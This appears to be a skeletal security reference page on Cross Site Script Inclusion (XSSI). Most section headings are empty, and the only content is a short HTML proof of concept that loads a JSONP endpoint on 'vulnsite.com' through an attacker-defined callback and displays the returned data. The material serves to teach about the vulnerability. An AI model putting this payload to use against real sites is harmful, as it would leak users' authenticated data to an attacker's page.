XSSI (Cross Site Script Inclusion)
Overview:
Understanding XSSI:
XSSI Attack Scenario:
<html> <script> function abc(s) { alert(JSON.stringify(s)); } </script> <script src="https://vulnsite.com/p/?showinfo=abc"></script> </html>
Remediation:
Reports
Writeups
Last updated